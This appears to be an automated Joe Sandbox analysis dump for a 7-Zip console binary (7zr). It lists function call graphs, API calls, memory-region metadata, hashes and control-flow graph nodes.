76780 a8d0e1 76752->76780 76754 a8d380 76755 a8d38a 76754->76755 76756 a8d665 76754->76756 76757 aa04d2 5 API calls 76755->76757 76758 a8d68b 76756->76758 76824 a8cd49 malloc _CxxThrowException free 76756->76824 76760 a8d392 76757->76760 76759 a8326b free 76758->76759 76759->76744 76763 a8e332 2 API calls 76760->76763 76762 a8d67c 76764 a62fec 3 API calls 76762->76764 76765 a8d3a1 76763->76765 76764->76758 76766 a8326b free 76765->76766 76767 a8d3b0 76766->76767 76769 a8d88d __EH_prolog 76768->76769 76770 a62e04 2 API calls 76769->76770 76771 a8d8c6 76770->76771 76772 a62e04 2 API calls 76771->76772 76773 a8d8d2 76772->76773 76774 a62e04 2 API calls 76773->76774 76775 a8d8de 76774->76775 76776 a82b63 2 API calls 76775->76776 76777 a8d8fa 76776->76777 76778 a82b63 2 API calls 76777->76778 76779 a8d34f 76778->76779 76779->76749 76781 a8d0eb __EH_prolog 76780->76781 76782 a8d138 76781->76782 76783 a8d10b 76781->76783 76785 a61e0c ctype 2 API calls 76782->76785 76792 a8d112 76782->76792 76784 a61e0c ctype 2 API calls 76783->76784 76784->76792 76786 a8d14b 76785->76786 76787 a62fec 3 API calls 76786->76787 76788 a8d17b 76787->76788 76830 a67b41 28 API calls 76788->76830 76790 a8d18a 76790->76792 76831 a6757d GetLastError 76790->76831 76792->76754 76798 a88d54 __EH_prolog 76793->76798 76794 a88e09 76796 a6965d VariantClear 76794->76796 76795 a88e15 76797 a88e2d 76795->76797 76800 a88e5e 76795->76800 76801 a88e21 76795->76801 76799 a88e11 76796->76799 76797->76800 76802 a88e2b 76797->76802 76808 a88da4 76798->76808 76832 a62b55 malloc _CxxThrowException free _CxxThrowException ctype 76798->76832 76799->76710 76803 a6965d VariantClear 76800->76803 76833 a63097 malloc _CxxThrowException free SysStringLen ctype 76801->76833 76805 a6965d VariantClear 76802->76805 76803->76799 76807 a88e47 76805->76807 76807->76799 76834 a88e7c 6 API calls __EH_prolog 76807->76834 76808->76794 76808->76795 76808->76799 76811 a89321 __EH_prolog 76810->76811 76812 a89360 76811->76812 76835 a69686 VariantClear 76811->76835 76813 a6965d VariantClear 76812->76813 76814 a893d0 76813->76814 76814->76718 76814->76726 76817 a8e33c __EH_prolog 76816->76817 76818 a61e0c ctype 2 API calls 76817->76818 76819 a8e34a 76818->76819 76820 a8d608 76819->76820 76836 a8e3d1 malloc _CxxThrowException __EH_prolog 76819->76836 76822 a61e40 free 76820->76822 76822->76741 76823->76743 76824->76762 76825->76721 76826->76734 76827->76737 76828->76725 76829->76729 76830->76790 76831->76792 76832->76808 76833->76802 76834->76799 76835->76812 76836->76820 76837 a8a7c5 76838 a8a7e9 76837->76838 76846 a8a96b 76837->76846 76841 a8a952 76838->76841 76863 aa04d2 5 API calls 76838->76863 76922 a8e0b0 6 API calls 76838->76922 76839 a8ade3 76942 a61e40 free 76839->76942 76841->76846 76923 a8e0b0 6 API calls 76841->76923 76842 a8adeb 76943 a61e40 free 76842->76943 76846->76839 76857 a8ac1e 76846->76857 76871 a8ac6c 76846->76871 76884 a8ad88 76846->76884 76888 a8ad17 76846->76888 76890 a8acbc 76846->76890 76904 a7101c 76846->76904 76907 a898f2 76846->76907 76913 a8cc6f 76846->76913 76924 a89531 5 API calls __EH_prolog 76846->76924 76925 a880c1 malloc _CxxThrowException __EH_prolog 76846->76925 76926 a8c820 5 API calls 2 library calls 76846->76926 76927 a8814d 6 API calls 76846->76927 76928 a88125 free ctype 76846->76928 76847 a8adf3 76848 a8ae99 76847->76848 76852 aa04d2 malloc _CxxThrowException free _CxxThrowException memcpy 76847->76852 76849 a61e0c ctype 2 API calls 76848->76849 76853 a8aea9 memset memset 76849->76853 76852->76847 76855 a8aedd 76853->76855 76854 a8ac26 76930 a61e40 free 76854->76930 76944 a61e40 free 76855->76944 76929 a61e40 free 76857->76929 76860 a8aee5 76945 a61e40 free 76860->76945 76863->76838 76864 a8aef0 76946 a61e40 free 76864->76946 76867 a8c430 76948 a61e40 free 76867->76948 76870 a8c438 76949 a61e40 free 76870->76949 76931 a61e40 free 76871->76931 76873 a8c443 76950 a61e40 free 76873->76950 76877 a8ac85 76932 a61e40 free 76877->76932 76878 a8c44e 76951 a61e40 free 76878->76951 76881 a8ac2e 76947 a61e40 free 76881->76947 76882 a8c459 76939 a88125 free ctype 76884->76939 76936 a88125 free ctype 76888->76936 76889 a8ad93 76940 a61e40 free 76889->76940 76933 a88125 free ctype 76890->76933 76894 a8adac 76941 a61e40 free 76894->76941 76895 a8acc7 76934 a61e40 free 76895->76934 76896 a8ad3c 76937 a61e40 free 76896->76937 76900 a8ad55 76938 a61e40 free 76900->76938 76901 a8ace0 76935 a61e40 free 76901->76935 76906 a6b95a 6 API calls 76904->76906 76905 a71028 76905->76846 76906->76905 76908 a898fc __EH_prolog 76907->76908 76952 a89987 76908->76952 76910 a89970 76910->76846 76911 a89911 76911->76910 76956 a8ef8d 12 API calls 2 library calls 76911->76956 76996 aacf91 76913->76996 77004 aa5505 76913->77004 77008 aaf445 76913->77008 76914 a8cc8b 76918 a8cccb 76914->76918 77014 a8979e VariantClear __EH_prolog 76914->77014 76916 a8ccb1 76916->76918 77015 a8cae9 VariantClear 76916->77015 76918->76846 76922->76838 76923->76846 76924->76846 76925->76846 76926->76846 76927->76846 76928->76846 76929->76854 76930->76881 76931->76877 76932->76881 76933->76895 76934->76901 76935->76881 76936->76896 76937->76900 76938->76881 76939->76889 76940->76894 76941->76881 76942->76842 76943->76847 76944->76860 76945->76864 76946->76881 76947->76867 76948->76870 76949->76873 76950->76878 76951->76882 76953 a89991 __EH_prolog 76952->76953 76957 ab80aa 76953->76957 76954 a899a8 76954->76911 76956->76910 76958 ab80b4 __EH_prolog 76957->76958 76959 a61e0c ctype 2 API calls 76958->76959 76960 ab80bf 76959->76960 76961 ab80d3 76960->76961 76963 aabdb5 76960->76963 76961->76954 76964 aabdbf __EH_prolog 76963->76964 76969 aabe69 76964->76969 76966 aabdef 76967 a62e04 2 API calls 76966->76967 76968 aabe16 76967->76968 76968->76961 76970 aabe73 __EH_prolog 76969->76970 76973 aa5e2b 76970->76973 76972 aabe7f 76972->76966 76974 aa5e35 __EH_prolog 76973->76974 76979 aa08b6 76974->76979 76976 aa5e41 76984 a7dfc9 malloc _CxxThrowException __EH_prolog 76976->76984 76978 aa5e57 76978->76972 76985 a69c60 76979->76985 76981 aa08c4 76990 a69c8f GetModuleHandleA GetProcAddress 76981->76990 76983 aa08f3 __aulldiv 76983->76976 76984->76978 76995 a69c4d GetCurrentProcess GetProcessAffinityMask 76985->76995 76987 a69c6e 76988 a69c80 GetSystemInfo 76987->76988 76989 a69c79 76987->76989 76988->76981 76989->76981 76991 a69cc4 GlobalMemoryStatusEx 76990->76991 76992 a69cef GlobalMemoryStatus 76990->76992 76991->76992 76994 a69cce 76991->76994 76993 a69d08 76992->76993 76993->76994 76994->76983 76995->76987 76997 aacf9b __EH_prolog 76996->76997 76998 aaf445 14 API calls 76997->76998 76999 aad018 76998->76999 77003 aad01f 76999->77003 77016 ab1511 76999->77016 77001 aad08b 77001->77003 77022 ab2c5d 11 API calls 2 library calls 77001->77022 77003->76914 77005 aa550f __EH_prolog 77004->77005 77148 aa4e8a 77005->77148 77009 aaf455 77008->77009 77364 a71092 77009->77364 77012 aaf478 77012->76914 77014->76916 77015->76918 77017 ab151b __EH_prolog 77016->77017 77023 ab10d3 77017->77023 77020 ab1589 77020->77001 77021 ab1552 _CxxThrowException 77021->77001 77021->77020 77022->77003 77024 ab10dd __EH_prolog 77023->77024 77025 aad1b7 free 77024->77025 77029 ab10f2 77025->77029 77026 ab12ef 77026->77020 77026->77021 77027 ab11f4 77027->77026 77054 a6b95a 6 API calls 77027->77054 77028 ab139e 77028->77026 77030 ab13c4 77028->77030 77032 a61e0c ctype 2 API calls 77028->77032 77029->77026 77029->77027 77031 a71168 10 API calls 77029->77031 77055 a71168 77030->77055 77031->77027 77032->77030 77034 ab13da 77037 ab13f9 77034->77037 77047 ab13de 77034->77047 77093 aaef67 _CxxThrowException 77034->77093 77058 aaf047 77037->77058 77040 ab14ba 77097 ab0943 50 API calls 2 library calls 77040->77097 77043 ab1450 77062 ab06ae 77043->77062 77045 ab14e7 77098 a92db9 free ctype 77045->77098 77099 a61e40 free 77047->77099 77049 ab148e 77051 aaf047 _CxxThrowException 77049->77051 77052 ab14ac 77051->77052 77052->77040 77096 aaef67 _CxxThrowException 77052->77096 77054->77028 77056 a7111c 10 API calls 77055->77056 77057 a7117b 77056->77057 77057->77034 77059 aaf063 77058->77059 77060 aaf072 77059->77060 77100 aaef67 _CxxThrowException 77059->77100 77060->77040 77060->77043 77094 aaef67 _CxxThrowException 77060->77094 77063 ab06b8 __EH_prolog 77062->77063 77101 ab03f4 77063->77101 77065 ab0877 77067 aab8dc ctype free 77065->77067 77066 a712a5 5 API calls 77091 ab0715 77066->77091 77068 ab08a6 77067->77068 77131 a61e40 free 77068->77131 77069 ab08e3 _CxxThrowException 77071 ab08f7 77069->77071 77076 aab8dc ctype free 77071->77076 77072 ab08ae 77132 a61e40 free 77072->77132 77073 a6429a 3 API calls 77073->77091 77075 ab08b6 77133 a61e40 free 77075->77133 77078 ab0914 77076->77078 77135 a61e40 free 77078->77135 77079 a61e0c ctype 2 API calls 77079->77091 77080 ab08be 77134 aac149 free ctype 77080->77134 77083 ab091c 77136 a61e40 free 77083->77136 77084 ab08d0 77084->77045 77084->77049 77095 aaef67 _CxxThrowException 77084->77095 77086 ab0924 77137 a61e40 free 77086->77137 77088 aa81ec 29 API calls 77088->77091 77089 ab092c 77138 aac149 free ctype 77089->77138 77091->77065 77091->77066 77091->77069 77091->77071 77091->77073 77091->77079 77091->77088 77092 aaef67 _CxxThrowException 77091->77092 77092->77091 77093->77037 77094->77043 77095->77049 77096->77040 77097->77045 77098->77047 77099->77026 77100->77060 77102 aaf047 _CxxThrowException 77101->77102 77103 ab0407 77102->77103 77105 aaf047 _CxxThrowException 77103->77105 77106 ab0475 77103->77106 77104 ab049a 77107 ab04b8 77104->77107 77143 ab159a malloc _CxxThrowException free ctype 77104->77143 77109 ab0421 77105->77109 77106->77104 77142 aafa3f 22 API calls 2 library calls 77106->77142 77108 ab04e8 77107->77108 77111 ab04cd 77107->77111 77145 ab7c4a malloc _CxxThrowException free ctype 77108->77145 77112 ab043e 77109->77112 77139 aaef67 _CxxThrowException 77109->77139 77144 aafff0 9 API calls 2 library calls 77111->77144 77140 aaf93c 7 API calls 2 library calls 77112->77140 77114 ab0492 77118 aaf047 _CxxThrowException 77114->77118 77117 ab04f3 77122 ab04e3 77117->77122 77146 a7089e malloc _CxxThrowException free _CxxThrowException memcpy 77117->77146 77118->77104 77120 ab04db 77123 aaf047 _CxxThrowException 77120->77123 77125 ab054a 77122->77125 77147 aaef67 _CxxThrowException 77122->77147 77123->77122 77124 ab046d 77126 aaf047 _CxxThrowException 77124->77126 77125->77091 77126->77106 77127 ab0446 77127->77124 77141 aaef67 _CxxThrowException 77127->77141 77131->77072 77132->77075 77133->77080 77134->77084 77135->77083 77136->77086 77137->77089 77138->77084 77139->77112 77140->77127 77141->77124 77142->77114 77143->77107 77144->77120 77145->77117 77146->77117 77147->77125 77149 aa4e94 __EH_prolog 77148->77149 77150 a62e04 2 API calls 77149->77150 77253 aa4f1d 77149->77253 77151 aa4ed7 77150->77151 77280 a77fc5 77151->77280 77153 aa4f0a 77155 a6965d VariantClear 77153->77155 77154 aa4f37 77156 aa4f63 77154->77156 77157 aa4f41 77154->77157 77160 aa4f15 77155->77160 77159 a62f88 3 API calls 77156->77159 77158 a6965d VariantClear 77157->77158 77161 aa4f4c 77158->77161 77162 aa4f71 77159->77162 77301 a61e40 free 77160->77301 77302 a61e40 free 77161->77302 77165 a6965d VariantClear 77162->77165 77166 aa4f80 77165->77166 77303 a75bcf malloc _CxxThrowException 77166->77303 77168 aa4f9a 77169 a62e47 2 API calls 77168->77169 77170 aa4fad 77169->77170 77171 a62f1c 2 API calls 77170->77171 77172 aa4fbd 77171->77172 77173 a62e04 2 API calls 77172->77173 77174 aa4fd1 77173->77174 77175 a62e04 2 API calls 77174->77175 77183 aa4fdd 77175->77183 77176 aa5404 77342 a61e40 free 77176->77342 77178 aa540c 77343 a61e40 free 77178->77343 77180 aa5414 77344 a61e40 free 77180->77344 77183->77176 77304 a75bcf malloc _CxxThrowException 77183->77304 77184 aa5099 77186 a62da9 2 API calls 77184->77186 77185 aa541c 77345 a61e40 free 77185->77345 77189 aa50a9 77186->77189 77188 aa5424 77346 a61e40 free 77188->77346 77190 a62fec 3 API calls 77189->77190 77192 aa50b6 77190->77192 77305 a61e40 free 77192->77305 77193 aa542c 77347 a61e40 free 77193->77347 77196 aa50be 77306 a61e40 free 77196->77306 77198 aa50cd 77199 a62f88 3 API calls 77198->77199 77200 aa50e3 77199->77200 77201 aa5100 77200->77201 77202 aa50f1 77200->77202 77307 a63044 malloc _CxxThrowException free ctype 77201->77307 77203 a630ea 3 API calls 77202->77203 77205 aa50fe 77203->77205 77308 a71029 6 API calls 77205->77308 77207 aa511a 77208 aa516b 77207->77208 77209 aa5120 77207->77209 77315 a7089e malloc _CxxThrowException free _CxxThrowException memcpy 77208->77315 77309 a61e40 free 77209->77309 77212 aa5187 77216 aa04d2 5 API calls 77212->77216 77213 aa5128 77310 a61e40 free 77213->77310 77215 aa5130 77311 a61e40 free 77215->77311 77218 aa51ba 77216->77218 77316 aa0516 malloc _CxxThrowException ctype 77218->77316 77219 aa5138 77312 a61e40 free 77219->77312 77222 aa51c5 77227 aa522d 77222->77227 77228 aa51f5 77222->77228 77223 aa5140 77313 a61e40 free 77223->77313 77225 aa5148 77314 a61e40 free 77225->77314 77230 a62e04 2 API calls 77227->77230 77317 a61e40 free 77228->77317 77277 aa5235 77230->77277 77231 aa51fd 77318 a61e40 free 77231->77318 77234 aa5205 77319 a61e40 free 77234->77319 77235 aa532e 77328 a61e40 free 77235->77328 77237 aa520d 77320 a61e40 free 77237->77320 77240 aa5347 77240->77176 77241 aa5358 77240->77241 77329 a61e40 free 77241->77329 77242 aa5215 77321 a61e40 free 77242->77321 77244 aa53a3 77335 a61e40 free 77244->77335 77246 aa5360 77330 a61e40 free 77246->77330 77247 aa521d 77322 a61e40 free 77247->77322 77251 aa5368 77331 a61e40 free 77251->77331 77253->76914 77255 aa53bc 77336 a61e40 free 77255->77336 77256 aa5370 77332 a61e40 free 77256->77332 77260 aa53c4 77337 a61e40 free 77260->77337 77261 aa5378 77333 a61e40 free 77261->77333 77263 aa04d2 5 API calls 77263->77277 77265 aa53cc 77338 a61e40 free 77265->77338 77266 aa5380 77334 a61e40 free 77266->77334 77270 aa53d4 77339 a61e40 free 77270->77339 77272 aa53dc 77340 a61e40 free 77272->77340 77274 aa53e4 77341 a61e40 free 77274->77341 77277->77235 77277->77244 77277->77263 77278 a62e04 2 API calls 77277->77278 77323 aa545c 5 API calls 2 library calls 77277->77323 77324 a71029 6 API calls 77277->77324 77325 a7089e malloc _CxxThrowException free _CxxThrowException memcpy 77277->77325 77326 aa0516 malloc _CxxThrowException ctype 77277->77326 77327 a61e40 free 77277->77327 77278->77277 77282 a77fcf __EH_prolog 77280->77282 77281 a77ff4 77291 a7800a 77281->77291 77348 a6950d 77281->77348 77282->77281 77284 a78061 77282->77284 77285 a7805c 77282->77285 77286 a78019 77282->77286 77284->77285 77298 a78025 77284->77298 77356 a69630 VariantClear 77285->77356 77286->77281 77289 a7801e 77286->77289 77287 a780b8 77292 a6965d VariantClear 77287->77292 77293 a78042 77289->77293 77294 a78022 77289->77294 77357 a69736 VariantClear 77291->77357 77296 a780c0 77292->77296 77354 a69597 VariantClear 77293->77354 77297 a78032 77294->77297 77294->77298 77296->77153 77296->77154 77353 a69604 VariantClear 77297->77353 77298->77291 77355 a695df VariantClear 77298->77355 77301->77253 77302->77253 77303->77168 77304->77184 77305->77196 77306->77198 77307->77205 77308->77207 77309->77213 77310->77215 77311->77219 77312->77223 77313->77225 77314->77253 77315->77212 77316->77222 77317->77231 77318->77234 77319->77237 77320->77242 77321->77247 77322->77253 77323->77277 77324->77277 77325->77277 77326->77277 77327->77277 77328->77240 77329->77246 77330->77251 77331->77256 77332->77261 77333->77266 77334->77253 77335->77255 77336->77260 77337->77265 77338->77270 77339->77272 77340->77274 77341->77253 77342->77178 77343->77180 77344->77185 77345->77188 77346->77193 77347->77253 77358 a69767 77348->77358 77350 a69518 SysAllocStringLen 77351 a6954f 77350->77351 77352 a69539 _CxxThrowException 77350->77352 77351->77291 77352->77351 77353->77291 77354->77291 77355->77291 77356->77291 77357->77287 77359 a69770 77358->77359 77360 a69779 77358->77360 77359->77350 77363 a69686 VariantClear 77360->77363 77362 a69780 77362->77350 77363->77362 77366 a6b95a 6 API calls 77364->77366 77365 a710aa 77365->77012 77367 aaf1b2 77365->77367 77366->77365 77368 aaf1bc __EH_prolog 77367->77368 77369 a71168 10 API calls 77368->77369 77370 aaf1d3 77369->77370 77371 aaf21c _CxxThrowException 77370->77371 77372 aaf231 memcpy 77370->77372 77373 aaf1e6 77370->77373 77371->77372 77375 aaf24c 77372->77375 77373->77012 77374 aaf2f0 memmove 77374->77375 77375->77373 77375->77374 77376 aaf31a memcpy 77375->77376 77376->77373 77377 a642d1 77378 a642bd 77377->77378 77379 a642c5 77378->77379 77380 a61e0c ctype 2 API calls 77378->77380 77380->77379 77381 a71ade 77382 a71ae8 __EH_prolog 77381->77382 77432 a613f5 77382->77432 77385 a71b32 6 API calls 77387 a71b8d 77385->77387 77395 a71bf8 77387->77395 77450 a71ea4 9 API calls 77387->77450 77388 a71b24 _CxxThrowException 77388->77385 77390 a71bdf 77391 a627bb 3 API calls 77390->77391 77392 a71bec 77391->77392 77451 a61e40 free 77392->77451 77394 a71c89 77446 a71eb9 77394->77446 77395->77394 77452 a81d73 5 API calls __EH_prolog 77395->77452 77400 a71cb2 _CxxThrowException 77400->77394 77433 a613ff __EH_prolog 77432->77433 77434 a87ebb free 77433->77434 77435 a6142b 77434->77435 77436 a61438 77435->77436 77453 a61212 free ctype 77435->77453 77438 a61e0c ctype 2 API calls 77436->77438 77443 a6144d 77438->77443 77439 a614f4 77439->77385 77449 a81d73 5 API calls __EH_prolog 77439->77449 77440 aa04d2 5 API calls 77440->77443 77443->77439 77443->77440 77444 a61507 77443->77444 77454 a61265 5 API calls 2 library calls 77443->77454 77455 a61524 malloc _CxxThrowException __EH_prolog ctype 77443->77455 77445 a62fec 3 API calls 77444->77445 77445->77439 77456 a69313 GetCurrentProcess OpenProcessToken 77446->77456 77449->77388 77450->77390 77451->77395 77452->77400 77453->77436 77454->77443 77455->77443 77457 a69390 77456->77457 77458 a6933a LookupPrivilegeValueW 77456->77458 77459 a69382 77458->77459 77460 a6934c AdjustTokenPrivileges 77458->77460 77461 a69385 CloseHandle 77459->77461 77460->77459 77462 a69372 GetLastError 77460->77462 77461->77457 77462->77461 77463 a9acd3 77464 a9ace0 77463->77464 77468 a9acf1 77463->77468 77464->77468 77469 a9acf8 77464->77469 77474 a9c0b3 __EH_prolog 77469->77474 77471 a9aceb 77476 a61e40 free 77471->77476 77472 a87193 free 77472->77474 77473 a9c0ed 77478 a61e40 free 77473->77478 77474->77472 77474->77473 77477 a61e40 free 77474->77477 77476->77468 77477->77474 77478->77471 77479 ae69d0 77480 ae69d7 malloc 77479->77480 77481 ae69d4 77479->77481 77483 a6b5d9 77484 a6b5e6 77483->77484 77485 a6b5f7 77483->77485 77484->77485 77489 a6b5fe 77484->77489 77490 a6b608 __EH_prolog 77489->77490 77496 ae6a40 VirtualFree 77490->77496 77492 a6b63d 77493 a6764c CloseHandle 77492->77493 77494 a6b5f1 77493->77494 77495 a61e40 free 77494->77495 77495->77485 77496->77492
                                APIs
                                • __EH_prolog.LIBCMT ref: 00AA81F1
                                  • Part of subcall function 00AAF749: _CxxThrowException.MSVCRT(?,00B14A58), ref: 00AAF792
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: ExceptionH_prologThrow
                                • String ID:
                                • API String ID: 461045715-3916222277
                                • Opcode ID: 780e4b4f9745bb2a360b9dd324478abf053616f7cf6d6d9abc720731976a627f
                                • Instruction ID: 9f32a575b4e339d92471a3a12d9848df306adabc9759c9b6ccb9013e3ba2b5a4
                                • Opcode Fuzzy Hash: 780e4b4f9745bb2a360b9dd324478abf053616f7cf6d6d9abc720731976a627f
                                • Instruction Fuzzy Hash: 2B92A030A00249DFDF15DFA8C944BEEBBB1BF1A304F244099E815AB292DB79DD45CB61
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A6686D
                                  • Part of subcall function 00A66848: FindClose.KERNELBASE(00000000,?,00A66880), ref: 00A66853
                                • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00A668A5
                                • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00A668DE
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: Find$FileFirst$CloseH_prolog
                                • String ID:
                                • API String ID: 3371352514-0
                                • Opcode ID: 0c2193f8516dd1f87f5a56470c314890b5bb3eb572b640e529a2ca9b20112560
                                • Instruction ID: 787e08e67e1930d95b84f78b3d31732fa4c2ff9972076e4be5eb978173b70551
                                • Opcode Fuzzy Hash: 0c2193f8516dd1f87f5a56470c314890b5bb3eb572b640e529a2ca9b20112560
                                • Instruction Fuzzy Hash: 28118B31500209ABCB10AFB4D951AEDBBB9EF64364F204669E9A1571D1DB328E86DB80

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 a9a013-a9a01a 1 a9a37a-a9a544 call aa04d2 call a61524 call aa04d2 call a61524 call a61e0c 0->1 2 a9a020-a9a02d call a71ac8 0->2 64 a9a551 1->64 65 a9a546-a9a54f call a9b0fa 1->65 8 a9a22e-a9a235 2->8 9 a9a033-a9a03a 2->9 13 a9a23b-a9a24d call a9b4f6 8->13 14 a9a367-a9a375 call a9b55f 8->14 11 a9a03c-a9a042 9->11 12 a9a054-a9a089 call a992d3 9->12 11->12 16 a9a044-a9a04f call a630ea 11->16 28 a9a099 12->28 29 a9a08b-a9a091 12->29 25 a9a259-a9a2fb call a87ebb call a627bb call a626dd call a83d70 call a9ad99 call a627bb 13->25 26 a9a24f-a9a253 13->26 30 a9ac23-a9ac2a 14->30 16->12 94 a9a2fd 25->94 95 a9a303-a9a362 call a9b6ab call a92db9 call a61e40 * 2 call a9bff8 25->95 26->25 34 a9a09d-a9a0de call a62fec call a9b369 28->34 29->28 33 a9a093-a9a097 29->33 35 a9ac3a-a9ac66 call a9b96d call a61e40 call a83247 30->35 36 a9ac2c-a9ac33 30->36 33->34 55 a9a0ea-a9a0fa 34->55 56 a9a0e0-a9a0e4 34->56 69 a9ac68-a9ac6a 35->69 70 a9ac6e-a9acb5 call a61e40 call a611c2 call a9be0c call a92db9 35->70 36->35 41 a9ac35 36->41 46 a9ac35 call a9b988 41->46 46->35 60 a9a10d 55->60 61 a9a0fc-a9a102 55->61 56->55 68 a9a114-a9a19e call a62fec call a87ebb call a9ad99 60->68 61->60 67 a9a104-a9a10b 61->67 66 a9a553-a9a55c 64->66 65->66 73 a9a55e-a9a560 66->73 74 a9a564-a9a5c1 call a62fec call a9b277 66->74 67->68 103 a9a1a2 call a8f8e0 68->103 69->70 73->74 97 a9a5cd-a9a652 call a9ad06 call a9bf3e call a73a29 call a62e04 call a84345 74->97 98 a9a5c3-a9a5c7 74->98 94->95 95->30 136 a9a654-a9a671 call a8375c call a9b96d 97->136 137 a9a676-a9a6c8 call a82096 97->137 98->97 108 a9a1a7-a9a1b1 103->108 112 a9a1c0-a9a1c9 108->112 113 a9a1b3-a9a1bb call a9c7d7 108->113 114 a9a1cb 112->114 115 a9a1d1-a9a229 call a9b6ab call a92db9 call a61e40 call a9bfa4 call a9940b 112->115 113->112 114->115 115->30 136->137 143 a9a6cd-a9a6d6 137->143 146 a9a6d8-a9a6dd call a9c7d7 143->146 147 a9a6e2-a9a6e5 143->147 146->147 150 a9a72e-a9a73a 147->150 151 a9a6e7-a9a6ee 147->151 152 a9a73c-a9a74a call a61fa0 150->152 153 a9a79e-a9a7aa 150->153 154 a9a6f0-a9a71d call a61fa0 fputs call a61fa0 call a61fb3 call a61fa0 151->154 155 a9a722-a9a725 151->155 170 a9a74c-a9a753 152->170 171 a9a755-a9a799 fputs call a62201 call a61fa0 fputs call a62201 call a61fa0 152->171 157 a9a7d9-a9a7e5 153->157 158 a9a7ac-a9a7b2 153->158 154->155 155->150 159 a9a727 155->159 164 a9a818-a9a81a 157->164 165 a9a7e7-a9a7ed 157->165 158->157 162 a9a7b4-a9a7d4 fputs call a62201 call a61fa0 158->162 159->150 162->157 167 a9a899-a9a8a5 164->167 168 a9a81c-a9a82b 164->168 165->167 172 a9a7f3-a9a813 fputs call a62201 call a61fa0 165->172 173 a9a8e9-a9a8ed 167->173 174 a9a8a7-a9a8ad 167->174 176 a9a82d-a9a84c fputs call a62201 call a61fa0 168->176 177 a9a851-a9a85d 168->177 170->153 170->171 171->153 172->164 183 a9a8ef 173->183 188 a9a8f6-a9a8f8 173->188 174->183 184 a9a8af-a9a8c2 call a61fa0 174->184 176->177 177->167 187 a9a85f-a9a872 call a61fa0 177->187 183->188 184->183 207 a9a8c4-a9a8e4 fputs call a62201 call a61fa0 184->207 187->167 209 a9a874-a9a894 fputs call a62201 call a61fa0 187->209 196 a9aaaf-a9aaeb call a843b3 call a61e40 call a9c104 call a9ad82 188->196 197 a9a8fe-a9a90a 188->197 246 a9ac0b-a9ac1e call a92db9 * 2 196->246 247 a9aaf1-a9aaf7 196->247 204 a9a910-a9a91f 197->204 205 a9aa73-a9aa89 call a61fa0 197->205 204->205 211 a9a925-a9a929 204->211 205->196 222 a9aa8b-a9aaaa fputs call a62201 call a61fa0 205->222 207->173 209->167 211->196 217 a9a92f-a9a93d 211->217 218 a9a96a-a9a971 217->218 219 a9a93f-a9a964 fputs call a62201 call a61fa0 217->219 227 a9a98f-a9a9a8 fputs call a62201 218->227 228 a9a973-a9a97a 218->228 219->218 222->196 241 a9a9ad-a9a9bd call a61fa0 227->241 228->227 234 a9a97c-a9a982 228->234 234->227 239 a9a984-a9a98d 234->239 239->227 244 a9aa06-a9aa1f fputs call a62201 239->244 241->244 252 a9a9bf-a9aa01 fputs call a62201 call a61fa0 fputs call a62201 call a61fa0 241->252 251 a9aa24-a9aa29 call a61fa0 244->251 246->30 247->246 259 a9aa2e-a9aa4b fputs call a62201 251->259 252->244 263 a9aa50-a9aa5b call a61fa0 259->263 263->196 269 a9aa5d-a9aa71 call a61fa0 call a9710e 263->269 269->196
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$ExceptionThrow
                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                • API String ID: 3665150552-429544124
                                • Opcode ID: cdfb5dbec980322a42aa451cbfc1a4811da00d31fe9fcaa8c578f16b7b0df93d
                                • Instruction ID: 30061f467748cdcf6553f16a01a6956591f08064614a30e4ef6f473d0102baf4
                                • Opcode Fuzzy Hash: cdfb5dbec980322a42aa451cbfc1a4811da00d31fe9fcaa8c578f16b7b0df93d
                                • Instruction Fuzzy Hash: EC529A30E00258DFCF26EBA4CA95BEDBBF5AF54304F14409AE04AA7291DB706E84CF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
